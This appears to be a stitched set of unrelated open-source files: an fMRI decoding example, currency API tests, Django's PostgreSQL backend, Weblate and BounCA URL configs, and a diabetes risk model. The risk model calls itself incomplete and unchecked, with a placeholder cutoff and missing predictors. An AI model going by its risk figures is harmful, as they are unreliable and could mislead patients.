"""
import time
### Fetch data using nilearn dataset fetcher ################################
from nilearn import datasets
data_files = datasets.fetch_haxby(n_subjects=1)
# load labels
import numpy as np
labels = np.recfromcsv(data_files.session_target[0], delimiter=" ")
stimuli = labels['labels']
# identify resting state labels in order to be able to remove them
resting_state = stimuli == "rest"
# find names of remaining active labels
categories = np.unique(stimuli[resting_state == False])
# extract tags indicating to which acquisition run a tag belongs
session_labels = labels["chunks"][resting_state == False]
# Load the fMRI data
from nilearn.input_data import NiftiMasker
# For decoding, standardizing is often very important
masker = NiftiMasker(mask=data_files['mask_vt'][0], standardize=True)
masked_timecourses = masker.fit_transform(
data_files.func[0])[resting_state == False]
### Classifiers definition
# A support vector classifier
from sklearn.svm import SVC
svm = SVC(C=1., kernel="linear")
from sklearn.grid_search import GridSearchCV
# GridSearchCV is slow, but note that it takes an 'n_jobs' parameter that
# can significantly speed up the fitting process on computers with
# multiple cores
svm_cv = GridSearchCV(SVC(C=1., kernel="linear"),
param_grid={'C': [.1, .5, 1., 5., 10., 50., 100.]},
scoring='f1')
# The logistic regression
from sklearn.linear_model import LogisticRegression, RidgeClassifier, \
RidgeClassifierCV
logistic = LogisticRegression(C=1., penalty="l1")
logistic_50 = LogisticRegression(C=50., penalty="l1")
logistic_l2 = LogisticRegression(C=1., penalty="l2")
logistic_cv = GridSearchCV(LogisticRegression(C=1., penalty="l1"),
param_grid={'C': [.1, .5, 1., 5., 10., 50., 100.]},
scoring='f1')
logistic_l2_cv = GridSearchCV(LogisticRegression(C=1., penalty="l1"),
param_grid={'C': [.1, .5, 1., 5., 10., 50., 100.]},
scoring='f1')
ridge = RidgeClassifier()
ridge_cv = RidgeClassifierCV()
# Make a data splitting object for cross validation
from sklearn.cross_validation import LeaveOneLabelOut, cross_val_score
cv = LeaveOneLabelOut(session_labels)
classifiers = {'SVC': svm,
'SVC cv': svm_cv,
'log l1': logistic,
'log l1 50': logistic_50,
'log l1 cv': logistic_cv,
'log l2': logistic_l2,
'log l2 cv': logistic_l2_cv,
'ridge': ridge,
'ridge cv': ridge_cv}
classifiers_scores = {}
for classifier_name, classifier in sorted(classifiers.items()):
classifiers_scores[classifier_name] = {}
print 70 * '_'
for category in categories:
classification_target = stimuli[resting_state == False] == category
t0 = time.time()
classifiers_scores[classifier_name][category] = cross_val_score(
classifier,
masked_timecourses,
classification_target,
cv=cv, scoring="f1")
print "%10s: %14s -- scores: %1.2f +- %1.2f, time %.2fs" % (
classifier_name, category,
classifiers_scores[classifier_name][category].mean(),
classifiers_scores[classifier_name][category].std(),
time.time() - t0)
###############################################################################
# make a rudimentary diagram
import matplotlib.pyplot as plt
plt.figure()
tick_position = np.arange(len(categories))
plt.xticks(tick_position, categories, rotation=45)
for color, classifier_name in zip(
['b', 'c', 'm', 'g', 'y', 'k', '.5', 'r', '#ffaaaa'],
sorted(classifiers)):
score_means = [classifiers_scores[classifier_name][category].mean()
for category in categories]
plt.bar(tick_position, score_means, label=classifier_name,
width=.11, color=color)
tick_position = tick_position + .09
plt.ylabel('Classification accuracy (f1 score)')
plt.xlabel('Visual stimuli category')
plt.ylim(ymin=0)
plt.legend(loc='lower center', ncol=3)
plt.title('Category-specific classification accuracy for different classifiers')
plt.tight_layout()
###############################################################################
# Plot the face vs house map for the different estimators
# use the average EPI as a background
from nilearn import image
mean_epi = image.mean_img(data_files.func[0]).get_data()
# Restrict the decoding to face vs house
condition_mask = np.logical_or(stimuli == 'face', stimuli == 'house')
masked_timecourses = masked_timecourses[condition_mask[resting_state == False]]
stimuli = stimuli[condition_mask]
# Transform the stimuli to binary values
stimuli = (stimuli == 'face').astype(np.int)
for classifier_name, classifier in sorted(classifiers.items()):
classifier.fit(masked_timecourses, stimuli)
if hasattr(classifier, 'coef_'):
weights = classifier.coef_[0]
elif hasattr(classifier, 'best_estimator_'):
weights = classifier.best_estimator_.coef_[0]
else:
continue
weight_img = masker.inverse_transform(weights)
weight_map = weight_img.get_data()
plt.figure(figsize=(3, 5))
plt.imshow(np.rot90(mean_epi[..., 27]), interpolation='nearest',
cmap=plt.cm.gray)
vmax = max(-weight_map.min(), weight_map.max())
plt.imshow(np.rot90(
np.ma.masked_inside(weight_map[..., 27], -.001*vmax, .001*vmax)),
interpolation='nearest', vmax=vmax, vmin=-vmax)
plt.axis('off')
plt.title('%s: face vs house' % classifier_name)
plt.tight_layout()
plt.show()
| bsd-3-clause | -6,053,872,600,998,459,000 | 34.215569 | 80 | 0.627444 | false |
CurrencyCloud/currencycloud-python | tests/integration/test_conversions.py | 1 | 6688 | from betamax import Betamax
from currencycloud import Client, Config
from currencycloud.resources import *
class TestConversions:
def setup_method(self, method):
# TODO: To run against real server please delete ../fixtures/vcr_cassettes/* and replace
# login_id and api_key with valid credentials before running the tests
login_id = '[email protected]'
api_key = 'deadbeefdeadbeefdeadbeefdeadbeefdeadbeefdeadbeefdeadbeefdeadbeef'
environment = Config.ENV_DEMO
self.client = Client(login_id, api_key, environment)
def test_conversions_can_create(self):
with Betamax(self.client.config.session) as betamax:
betamax.use_cassette('conversions/create')
conversion = self.client.conversions.create(buy_currency="EUR",
sell_currency="GBP",
fixed_side="buy",
amount="1000",
term_agreement="true")
assert conversion is not None
assert isinstance(conversion, Conversion)
assert conversion.id is not None
assert conversion.client_buy_amount == "1000.00"
def test_actions_can_find(self):
with Betamax(self.client.config.session) as betamax:
betamax.use_cassette('conversions/find')
conversions = self.client.conversions.find(per_page=1)
assert conversions
assert len(conversions) == 1
conversion = conversions[0]
assert conversion is not None
assert isinstance(conversion, Conversion)
assert conversion.client_buy_amount == "1000.00"
def test_actions_can_retrieve(self):
with Betamax(self.client.config.session) as betamax:
betamax.use_cassette('conversions/retrieve')
conversion = self.client.conversions.retrieve("a26ffc86-c0f6-45d8-8c1c-6a3e579ce974")
assert conversion is not None
assert isinstance(conversion, Conversion)
assert conversion.id == "a26ffc86-c0f6-45d8-8c1c-6a3e579ce974"
assert conversion.client_buy_amount == "1000.00"
def test_actions_can_cancel(self):
with Betamax(self.client.config.session) as betamax:
betamax.use_cassette('conversions/cancel')
response = self.client.conversions.cancel("84033366-2135-4fc9-8016-41a7adba463e")
assert response is not None
assert response.conversion_id == "84033366-2135-4fc9-8016-41a7adba463e"
def test_actions_can_date_change(self):
with Betamax(self.client.config.session) as betamax:
betamax.use_cassette('conversions/date_change')
response = self.client.conversions.date_change("d3c7d733-7c2f-443d-a082-4c728157b99f",
new_settlement_date="2019-04-02T13:00:00+00:00")
assert response is not None
assert response.conversion_id == "d3c7d733-7c2f-443d-a082-4c728157b99f"
assert response.new_settlement_date == "2019-04-02T13:00:00+00:00"
def test_actions_can_split(self):
with Betamax(self.client.config.session) as betamax:
betamax.use_cassette('conversions/split')
response = self.client.conversions.split("d3c7d733-7c2f-443d-a082-4c728157b99f",
amount="100")
assert response is not None
assert response.parent_conversion.get("id") == "d3c7d733-7c2f-443d-a082-4c728157b99f"
assert response.child_conversion.get("id") is not None
def test_actions_can_split_preview(self):
with Betamax(self.client.config.session) as betamax:
betamax.use_cassette('conversions/split_preview')
response = self.client.conversions.split_preview("c805aa35-9bd3-4afe-ade2-d341e551aa16",
amount="100")
assert response is not None
assert response.parent_conversion.get("id") == "c805aa35-9bd3-4afe-ade2-d341e551aa16"
assert response.child_conversion.get("sell_amount") == '100.00'
def test_actions_can_split_history(self):
with Betamax(self.client.config.session) as betamax:
betamax.use_cassette('conversions/split_history')
response = self.client.conversions.split_history("c805aa35-9bd3-4afe-ade2-d341e551aa16")
assert response is not None
for element in response.child_conversions:
assert element.get('id') is not None
assert element.get('sell_amount') == '100.00'
assert element.get('short_reference') is not None
def test_actions_can_quote_date_change(self):
with Betamax(self.client.config.session) as betamax:
betamax.use_cassette('conversions/quote_date_change')
response = self.client.conversions.date_change_quote('2b436517-619b-4abe-a591-821dd31b264f',
new_settlement_date='2018-10-29T16:30:00+00:00')
assert response is not None
assert response.conversion_id == '2b436517-619b-4abe-a591-821dd31b264f'
assert response.new_settlement_date == '2018-10-29T16:30:00+00:00'
def test_actions_can_quote_cancellation(self):
with Betamax(self.client.config.session) as betamax:
betamax.use_cassette('conversions/cancellation_quote')
response = self.client.conversions.cancellation_quote('63298593-bd8d-455d-8ee8-2f85dd390f2f')
assert response is not None
assert response.amount is not None
assert response.currency is not None
assert response.event_date_time is not None
def test_action_can_retrieve_profit_and_loss(self):
with Betamax(self.client.config.session) as betamax:
betamax.use_cassette('conversions/profit_and_loss')
response = self.client.conversions.profit_and_loss()
assert response is not None
for element in response:
assert element.account_id is not None
assert element.contact_id is not None
assert element.conversion_id is not None
assert element.event_type is not None
assert element.amount is not None
assert element.currency is not None
assert element.event_date_time is not None
| mit | 6,826,754,372,983,621,000 | 43.586667 | 113 | 0.615431 | false |
doirisks/dori | models/10.1001:archinte.167.10.1068/model_f.py | 1 | 4027 | """
model_f.py
by Ted Morin
contains a function to predict 8-year Diabetes Mellitus risk, using the beta coefficients and logistic model from
10.1001/archinte.167.10.1068
2007 Prediction of Incident Diabetes Mellitus in Middle Aged Adults
Framingham Heart Study
(Table 5, Complex Model 2)
function expects parameters of:
"Male Sex" "Age" "Systolic BP" "Diastolic BP" "BMI" "Waist Circumf" "HDL-C" "Triglycerides" "Fasting Glucose"
years mm Hg mm Hg kg/m^2 cm mg/dL mg/dL mg/dL
bool int/float int/float int/float int/float i/f i/f i/f i/f
function expects parameters of (continued):
"Parental History of DM" "Antihypertensive Medication Use" "Gutt Insulin Sensitivity Index"
bool bool float/int
"""
# COMPLEX MODELS ARE INCOMPLETE: UNCHECKED + PERCENTILE VALUES NOT LISTED
def model(ismale,age,sbp,dbp,bmi,waistcirc,hdl,tri,glucose,parent,trtbp, guttinsul):
# imports
import numpy as np
# betas
# derived from Odds Ratios in paper
betas = np.array([
    -5.427, #Intercept
0, #Age<50
-0.0043648054, #Age 50-64
-0.0915149811, #Age >=65
0.0492180227, #Male
0.2380461031, #Parental history of diabetes mellitus
0, #BMI <25
0.0681858617, #BMI 25.0-29.9
0.2552725051, #BMI >=30
0.1461280357, #Blood pressure >130/85 mm Hg or receiving therapy
0.3384564936, #HDL-C level <40 mg/dL in men or <50 mg/dL in women
0.1760912591, #Triglyceride level >=150 mg/dL
0.096910013, #Waist circumference >88 cm in women or >102 cm in men
0.7259116323, #Fasting glucose level 100-126 mg/dL
0, #2-Hour OGTT finding 140-200 mg/dL # Not Included
0, #Fasting insulin level >75th percentile # Not Included
0, #C-reactive protein level >75th percentile # Not Included
0.357934847, #Log Gutt insulin sensitivity index <25th percentile # TODO impossible?
0, #Log HOMA insulin resistance index >75th percentile # Not Included
0, #HOMA beta-cell index <25th percentile # Not Included
])
# determining factors:
values = [0]*20
values[0] = 1
# age
if age < 50:
values[1] = 1
    elif age < 65:
values[2] = 1
else :
values[3] = 1
# sex
if ismale:
values[4] = 1
# parental history
if parent:
values[5] = 1
# BMI
if bmi < 25.:
values[6] = 1
elif bmi < 30.:
values[7] = 1
else :
values[8] = 1
# blood pressure
if ((sbp >= 130.) or (dbp >= 85.) or trtbp) :
values[9] = 1
# HDL-C
if ismale and hdl < 40:
values[10] = 1
elif (not ismale) and hdl < 50:
values[10] = 1
# Triglycerides
if tri >= 150:
values[11] = 1
# Waist Circumference
if ismale and waistcirc > 102:
values[12] = 1
elif (not ismale) and waistcirc > 88:
values[12] = 1
# Fasting glucose
if glucose >= 100:
values[13] = 1
# Log GUTT insulin sensitivity index
guttinsul = np.log(guttinsul)
crit_guttinsul = -1000000 # real value not known TODO
if guttinsul < crit_guttinsul:
values[17] = 1
# dot betas and values
z = np.dot(betas,np.array(values))
# calculate risk
return 1.0 / (1 + np.exp(-z))
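# Illustrative sketch (not part of the original model file): the returned value
# is the logistic risk 1 / (1 + exp(-z)) with z = dot(betas, values), so a call
# could look like the following (all input values below are made up):
#
#   risk = model(ismale=True, age=55, sbp=135, dbp=88, bmi=31.0, waistcirc=105,
#                hdl=38, tri=160, glucose=105, parent=True, trtbp=False,
#                guttinsul=5.0)
#   print("8-year DM risk: %.3f" % risk)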
| gpl-3.0 | 3,382,809,701,925,434,000 | 34.307018 | 111 | 0.503602 | false |
zstackorg/zstack-woodpecker | integrationtest/vm/vpc/suite_setup.py | 1 | 4050 | '''
setup virtual router suite environment, including starting the zstack node,
deploying the initial database and setting up vlan devices.
@author: Frank
'''
import os
import zstacklib.utils.linux as linux
import zstacklib.utils.http as http
import zstacktestagent.plugins.host as host_plugin
import zstacktestagent.testagent as testagent
import zstackwoodpecker.operations.scenario_operations as scenario_operations
import zstackwoodpecker.operations.deploy_operations as deploy_operations
import zstackwoodpecker.operations.config_operations as config_operations
import zstackwoodpecker.test_lib as test_lib
import zstackwoodpecker.test_util as test_util
import zstackwoodpecker.operations.config_operations as conf_ops
USER_PATH = os.path.expanduser('~')
EXTRA_SUITE_SETUP_SCRIPT = '%s/.zstackwoodpecker/extra_suite_setup_config.sh' % USER_PATH
EXTRA_HOST_SETUP_SCRIPT = '%s/.zstackwoodpecker/extra_host_setup_config.sh' % USER_PATH
def test():
if test_lib.scenario_config != None and test_lib.scenario_file != None and not os.path.exists(test_lib.scenario_file):
scenario_operations.deploy_scenario(test_lib.all_scenario_config, test_lib.scenario_file, test_lib.deploy_config)
test_util.test_skip('Suite Setup Success')
if test_lib.scenario_config != None and test_lib.scenario_destroy != None:
scenario_operations.destroy_scenario(test_lib.all_scenario_config, test_lib.scenario_destroy)
nic_name = "eth0"
if test_lib.scenario_config != None and test_lib.scenario_file != None and os.path.exists(test_lib.scenario_file):
nic_name = "zsn0"
linux.create_vlan_eth(nic_name, 1010)
linux.create_vlan_eth(nic_name, 1011)
    #This vlan creation is not a must if testing is under a nested virt env, but it is required on a physical host without enough physical network devices, or when your test execution machine is not the same one as the host machine.
#linux.create_vlan_eth("eth0", 10, "10.0.0.200", "255.255.255.0")
#linux.create_vlan_eth("eth0", 11, "10.0.1.200", "255.255.255.0")
#no matter if current host is a ZStest host, we need to create 2 vlan devs for future testing connection for novlan test cases.
linux.create_vlan_eth(nic_name, 10)
linux.create_vlan_eth(nic_name, 11)
    #If the test execution machine is not the same one as the host machine, the deploy work needs to be separated into 2 steps (deploy_test_agent, execute_plan_without_deploy_test_agent), and it can not directly call SetupAction.run()
test_lib.setup_plan.deploy_test_agent()
cmd = host_plugin.CreateVlanDeviceCmd()
hosts = test_lib.lib_get_all_hosts_from_plan()
if type(hosts) != type([]):
hosts = [hosts]
for host in hosts:
cmd.ethname = nic_name
cmd.vlan = 10
http.json_dump_post(testagent.build_http_path(host.managementIp_, host_plugin.CREATE_VLAN_DEVICE_PATH), cmd)
cmd.vlan = 11
http.json_dump_post(testagent.build_http_path(host.managementIp_, host_plugin.CREATE_VLAN_DEVICE_PATH), cmd)
test_lib.setup_plan.execute_plan_without_deploy_test_agent()
conf_ops.change_global_config("applianceVm", "agent.deployOnStart", 'true')
if os.path.exists(EXTRA_SUITE_SETUP_SCRIPT):
os.system("bash %s" % EXTRA_SUITE_SETUP_SCRIPT)
deploy_operations.deploy_initial_database(test_lib.deploy_config, test_lib.all_scenario_config, test_lib.scenario_file)
for host in hosts:
os.system("bash %s %s" % (EXTRA_HOST_SETUP_SCRIPT, host.managementIp_))
delete_policy = test_lib.lib_set_delete_policy('vm', 'Direct')
delete_policy = test_lib.lib_set_delete_policy('volume', 'Direct')
delete_policy = test_lib.lib_set_delete_policy('image', 'Direct')
# if test_lib.lib_get_ha_selffencer_maxattempts() != None:
# test_lib.lib_set_ha_selffencer_maxattempts('60')
# test_lib.lib_set_ha_selffencer_storagechecker_timeout('60')
test_lib.lib_set_primary_storage_imagecache_gc_interval(1)
test_util.test_pass('Suite Setup Success')
| apache-2.0 | -1,399,914,541,662,224,000 | 53.479452 | 221 | 0.716543 | false |
wkschwartz/django | django/db/backends/postgresql/base.py | 1 | 13221 | """
PostgreSQL database backend for Django.
Requires psycopg 2: https://www.psycopg.org/
"""
import asyncio
import threading
import warnings
from contextlib import contextmanager
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
from django.db import DatabaseError as WrappedDatabaseError, connections
from django.db.backends.base.base import BaseDatabaseWrapper
from django.db.backends.utils import (
CursorDebugWrapper as BaseCursorDebugWrapper,
)
from django.utils.asyncio import async_unsafe
from django.utils.functional import cached_property
from django.utils.safestring import SafeString
from django.utils.version import get_version_tuple
try:
import psycopg2 as Database
import psycopg2.extensions
import psycopg2.extras
except ImportError as e:
raise ImproperlyConfigured("Error loading psycopg2 module: %s" % e)
def psycopg2_version():
version = psycopg2.__version__.split(' ', 1)[0]
return get_version_tuple(version)
PSYCOPG2_VERSION = psycopg2_version()
if PSYCOPG2_VERSION < (2, 5, 4):
raise ImproperlyConfigured("psycopg2_version 2.5.4 or newer is required; you have %s" % psycopg2.__version__)
# Some of these import psycopg2, so import them after checking if it's installed.
from .client import DatabaseClient # NOQA
from .creation import DatabaseCreation # NOQA
from .features import DatabaseFeatures # NOQA
from .introspection import DatabaseIntrospection # NOQA
from .operations import DatabaseOperations # NOQA
from .schema import DatabaseSchemaEditor # NOQA
psycopg2.extensions.register_adapter(SafeString, psycopg2.extensions.QuotedString)
psycopg2.extras.register_uuid()
# Register support for inet[] manually so we don't have to handle the Inet()
# object on load all the time.
INETARRAY_OID = 1041
INETARRAY = psycopg2.extensions.new_array_type(
(INETARRAY_OID,),
'INETARRAY',
psycopg2.extensions.UNICODE,
)
psycopg2.extensions.register_type(INETARRAY)
class DatabaseWrapper(BaseDatabaseWrapper):
vendor = 'postgresql'
display_name = 'PostgreSQL'
# This dictionary maps Field objects to their associated PostgreSQL column
# types, as strings. Column-type strings can contain format strings; they'll
# be interpolated against the values of Field.__dict__ before being output.
# If a column type is set to None, it won't be included in the output.
data_types = {
'AutoField': 'serial',
'BigAutoField': 'bigserial',
'BinaryField': 'bytea',
'BooleanField': 'boolean',
'CharField': 'varchar(%(max_length)s)',
'DateField': 'date',
'DateTimeField': 'timestamp with time zone',
'DecimalField': 'numeric(%(max_digits)s, %(decimal_places)s)',
'DurationField': 'interval',
'FileField': 'varchar(%(max_length)s)',
'FilePathField': 'varchar(%(max_length)s)',
'FloatField': 'double precision',
'IntegerField': 'integer',
'BigIntegerField': 'bigint',
'IPAddressField': 'inet',
'GenericIPAddressField': 'inet',
'JSONField': 'jsonb',
'NullBooleanField': 'boolean',
'OneToOneField': 'integer',
'PositiveBigIntegerField': 'bigint',
'PositiveIntegerField': 'integer',
'PositiveSmallIntegerField': 'smallint',
'SlugField': 'varchar(%(max_length)s)',
'SmallAutoField': 'smallserial',
'SmallIntegerField': 'smallint',
'TextField': 'text',
'TimeField': 'time',
'UUIDField': 'uuid',
}
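    # Illustrative note (not part of the original file): a CharField declared
    # with max_length=100 resolves to 'varchar(%(max_length)s)' % {'max_length': 100},
    # i.e. the column type 'varchar(100)'.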
data_type_check_constraints = {
'PositiveBigIntegerField': '"%(column)s" >= 0',
'PositiveIntegerField': '"%(column)s" >= 0',
'PositiveSmallIntegerField': '"%(column)s" >= 0',
}
operators = {
'exact': '= %s',
'iexact': '= UPPER(%s)',
'contains': 'LIKE %s',
'icontains': 'LIKE UPPER(%s)',
'regex': '~ %s',
'iregex': '~* %s',
'gt': '> %s',
'gte': '>= %s',
'lt': '< %s',
'lte': '<= %s',
'startswith': 'LIKE %s',
'endswith': 'LIKE %s',
'istartswith': 'LIKE UPPER(%s)',
'iendswith': 'LIKE UPPER(%s)',
}
# The patterns below are used to generate SQL pattern lookup clauses when
# the right-hand side of the lookup isn't a raw string (it might be an expression
# or the result of a bilateral transformation).
# In those cases, special characters for LIKE operators (e.g. \, *, _) should be
# escaped on database side.
#
# Note: we use str.format() here for readability as '%' is used as a wildcard for
# the LIKE operator.
pattern_esc = r"REPLACE(REPLACE(REPLACE({}, E'\\', E'\\\\'), E'%%', E'\\%%'), E'_', E'\\_')"
pattern_ops = {
'contains': "LIKE '%%' || {} || '%%'",
'icontains': "LIKE '%%' || UPPER({}) || '%%'",
'startswith': "LIKE {} || '%%'",
'istartswith': "LIKE UPPER({}) || '%%'",
'endswith': "LIKE '%%' || {}",
'iendswith': "LIKE '%%' || UPPER({})",
}
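    # Illustrative note (not part of the original file): when the right-hand
    # side of e.g. an icontains lookup is an expression rather than a raw
    # string, it is first wrapped in pattern_esc (so \, % and _ lose their LIKE
    # wildcard meaning) and then substituted for {} in the matching pattern_ops
    # template, giving SQL of the rough form
    #   LIKE '%' || UPPER(<escaped rhs>) || '%'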
Database = Database
SchemaEditorClass = DatabaseSchemaEditor
# Classes instantiated in __init__().
client_class = DatabaseClient
creation_class = DatabaseCreation
features_class = DatabaseFeatures
introspection_class = DatabaseIntrospection
ops_class = DatabaseOperations
# PostgreSQL backend-specific attributes.
_named_cursor_idx = 0
def get_connection_params(self):
settings_dict = self.settings_dict
# None may be used to connect to the default 'postgres' db
if settings_dict['NAME'] == '':
raise ImproperlyConfigured(
"settings.DATABASES is improperly configured. "
"Please supply the NAME value.")
if len(settings_dict['NAME'] or '') > self.ops.max_name_length():
raise ImproperlyConfigured(
"The database name '%s' (%d characters) is longer than "
"PostgreSQL's limit of %d characters. Supply a shorter NAME "
"in settings.DATABASES." % (
settings_dict['NAME'],
len(settings_dict['NAME']),
self.ops.max_name_length(),
)
)
conn_params = {
'database': settings_dict['NAME'] or 'postgres',
**settings_dict['OPTIONS'],
}
conn_params.pop('isolation_level', None)
if settings_dict['USER']:
conn_params['user'] = settings_dict['USER']
if settings_dict['PASSWORD']:
conn_params['password'] = settings_dict['PASSWORD']
if settings_dict['HOST']:
conn_params['host'] = settings_dict['HOST']
if settings_dict['PORT']:
conn_params['port'] = settings_dict['PORT']
return conn_params
@async_unsafe
def get_new_connection(self, conn_params):
connection = Database.connect(**conn_params)
# self.isolation_level must be set:
# - after connecting to the database in order to obtain the database's
# default when no value is explicitly specified in options.
# - before calling _set_autocommit() because if autocommit is on, that
# will set connection.isolation_level to ISOLATION_LEVEL_AUTOCOMMIT.
options = self.settings_dict['OPTIONS']
try:
self.isolation_level = options['isolation_level']
except KeyError:
self.isolation_level = connection.isolation_level
else:
# Set the isolation level to the value from OPTIONS.
if self.isolation_level != connection.isolation_level:
connection.set_session(isolation_level=self.isolation_level)
# Register dummy loads() to avoid a round trip from psycopg2's decode
# to json.dumps() to json.loads(), when using a custom decoder in
# JSONField.
psycopg2.extras.register_default_jsonb(conn_or_curs=connection, loads=lambda x: x)
return connection
def ensure_timezone(self):
if self.connection is None:
return False
conn_timezone_name = self.connection.get_parameter_status('TimeZone')
timezone_name = self.timezone_name
if timezone_name and conn_timezone_name != timezone_name:
with self.connection.cursor() as cursor:
cursor.execute(self.ops.set_time_zone_sql(), [timezone_name])
return True
return False
def init_connection_state(self):
self.connection.set_client_encoding('UTF8')
timezone_changed = self.ensure_timezone()
if timezone_changed:
# Commit after setting the time zone (see #17062)
if not self.get_autocommit():
self.connection.commit()
@async_unsafe
def create_cursor(self, name=None):
if name:
# In autocommit mode, the cursor will be used outside of a
# transaction, hence use a holdable cursor.
cursor = self.connection.cursor(name, scrollable=False, withhold=self.connection.autocommit)
else:
cursor = self.connection.cursor()
cursor.tzinfo_factory = self.tzinfo_factory if settings.USE_TZ else None
return cursor
def tzinfo_factory(self, offset):
return self.timezone
@async_unsafe
def chunked_cursor(self):
self._named_cursor_idx += 1
# Get the current async task
# Note that right now this is behind @async_unsafe, so this is
# unreachable, but in future we'll start loosening this restriction.
# For now, it's here so that every use of "threading" is
# also async-compatible.
try:
if hasattr(asyncio, 'current_task'):
# Python 3.7 and up
current_task = asyncio.current_task()
else:
# Python 3.6
current_task = asyncio.Task.current_task()
except RuntimeError:
current_task = None
# Current task can be none even if the current_task call didn't error
if current_task:
task_ident = str(id(current_task))
else:
task_ident = 'sync'
# Use that and the thread ident to get a unique name
return self._cursor(
name='_django_curs_%d_%s_%d' % (
# Avoid reusing name in other threads / tasks
threading.current_thread().ident,
task_ident,
self._named_cursor_idx,
)
)
def _set_autocommit(self, autocommit):
with self.wrap_database_errors:
self.connection.autocommit = autocommit
def check_constraints(self, table_names=None):
"""
Check constraints by setting them to immediate. Return them to deferred
afterward.
"""
with self.cursor() as cursor:
cursor.execute('SET CONSTRAINTS ALL IMMEDIATE')
cursor.execute('SET CONSTRAINTS ALL DEFERRED')
def is_usable(self):
try:
# Use a psycopg cursor directly, bypassing Django's utilities.
with self.connection.cursor() as cursor:
cursor.execute('SELECT 1')
except Database.Error:
return False
else:
return True
@contextmanager
def _nodb_cursor(self):
try:
with super()._nodb_cursor() as cursor:
yield cursor
except (Database.DatabaseError, WrappedDatabaseError):
warnings.warn(
"Normally Django will use a connection to the 'postgres' database "
"to avoid running initialization queries against the production "
"database when it's not needed (for example, when running tests). "
"Django was unable to create a connection to the 'postgres' database "
"and will use the first PostgreSQL database instead.",
RuntimeWarning
)
for connection in connections.all():
if connection.vendor == 'postgresql' and connection.settings_dict['NAME'] != 'postgres':
conn = self.__class__(
{**self.settings_dict, 'NAME': connection.settings_dict['NAME']},
alias=self.alias,
)
try:
with conn.cursor() as cursor:
yield cursor
finally:
conn.close()
break
else:
raise
@cached_property
def pg_version(self):
with self.temporary_connection():
return self.connection.server_version
def make_debug_cursor(self, cursor):
return CursorDebugWrapper(cursor, self)
class CursorDebugWrapper(BaseCursorDebugWrapper):
def copy_expert(self, sql, file, *args):
with self.debug_sql(sql):
return self.cursor.copy_expert(sql, file, *args)
def copy_to(self, file, table, *args, **kwargs):
with self.debug_sql(sql='COPY %s TO STDOUT' % table):
return self.cursor.copy_to(file, table, *args, **kwargs)
| bsd-3-clause | 582,152,056,054,091,400 | 37.54519 | 113 | 0.603736 | false |
tidalf/plugin.audio.qobuz | resources/lib/qobuz/node/similar_artist.py | 1 | 1695 | '''
qobuz.node.similar_artist
~~~~~~~~~~~~~~~~~~~~~~~~~
:part_of: kodi-qobuz
:copyright: (c) 2012-2018 by Joachim Basmaison, Cyril Leclerc
:license: GPLv3, see LICENSE for more details.
'''
from qobuz import config
from qobuz.api import api
from qobuz.gui.util import lang
from qobuz.node import getNode, Flag, helper
from qobuz.node.inode import INode
from qobuz.debug import getLogger
logger = getLogger(__name__)
class Node_similar_artist(INode):
def __init__(self, parent=None, parameters=None, data=None):
parameters = {} if parameters is None else parameters
super(Node_similar_artist, self).__init__(
parent=parent, parameters=parameters, data=data)
self.nt = Flag.SIMILAR_ARTIST
self.content_type = 'artists'
self.lang = lang(30156)
def fetch(self, options=None):
return api.get('/artist/getSimilarArtists',
artist_id=self.nid,
offset=self.offset,
limit=self.limit)
def _count(self):
return len(self.data['artists']['items'])
def populate(self, options=None):
skip_empty = not config.app.registry.get(
'display_artist_without_album', to='bool')
for data in self.data['artists']['items']:
if skip_empty and data['albums_count'] < 1:
continue
artist = getNode(Flag.ARTIST, data=data)
cache = artist.fetch(helper.TreeTraverseOpts(lvl=3,noRemote=True))
if cache is not None:
artist.data = cache
self.add_child(artist)
return True if len(self.data['artists']['items']) > 0 else False
| gpl-3.0 | 2,751,515,988,515,557,400 | 34.3125 | 78 | 0.60472 | false |
lem9/weblate | weblate/api/urls.py | 1 | 1842 | # -*- coding: utf-8 -*-
#
# Copyright © 2012 - 2017 Michal Čihař <[email protected]>
#
# This file is part of Weblate <https://weblate.org/>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
#
from __future__ import unicode_literals
from django.conf.urls import url, include
from weblate.api.views import (
ProjectViewSet, ComponentViewSet, TranslationViewSet, LanguageViewSet,
UnitViewSet, ChangeViewSet, SourceViewSet, ScreenshotViewSet,
)
from weblate.api.routers import WeblateRouter
# Routers provide an easy way of automatically determining the URL conf.
router = WeblateRouter()
router.register(
r'projects',
ProjectViewSet
)
router.register(
r'components',
ComponentViewSet,
'component',
)
router.register(
r'translations',
TranslationViewSet
)
router.register(
r'languages',
LanguageViewSet
)
router.register(
r'changes',
ChangeViewSet
)
router.register(
r'units',
UnitViewSet
)
router.register(
r'sources',
SourceViewSet
)
router.register(
r'screenshots',
ScreenshotViewSet
)
# Wire up our API using automatic URL routing.
# Additionally, we include login URLs for the browsable API.
urlpatterns = [
url(
r'^',
include(router.urls)
),
]
| gpl-3.0 | -5,053,262,542,800,978,000 | 23.52 | 74 | 0.72485 | false |
repleo/bounca | api/urls.py | 1 | 1469 | """API v1 end-points"""
from django.conf.urls import include, url
from rest_auth.registration.urls import urlpatterns as urlpatterns_registration
from rest_auth.urls import urlpatterns as urlpatterns_rest_auth
from rest_framework_swagger.views import get_swagger_view
from .views import (
CertificateCRLFileView, CertificateCRLView, CertificateFilesView, CertificateInfoView, CertificateInstanceView,
CertificateListView, CertificateRevokeView)
urlpatterns_apiv1 = [
url(r'^certificates/files/(?P<pk>[\d]+)$', CertificateFilesView.as_view(), name='certificate-files'),
url(r'^certificates/crl/(?P<pk>[\d]+)$', CertificateCRLView.as_view(), name='certificate-crl'),
url(r'^certificates/crlfile/(?P<pk>[\d]+)$', CertificateCRLFileView.as_view(), name='certificate-crl-file'),
url(r'^certificates/(?P<pk>[\d]+)$', CertificateInstanceView.as_view(), name='certificate-instance'),
url(r'^certificates/info/(?P<pk>[\d]+)$', CertificateInfoView.as_view(), name='certificate-info'),
url(r'^certificates/revoke/(?P<pk>[\d]+)$', CertificateRevokeView.as_view(), name='certificate-revoke'),
url(r'^certificates', CertificateListView.as_view(), name='certificates'),
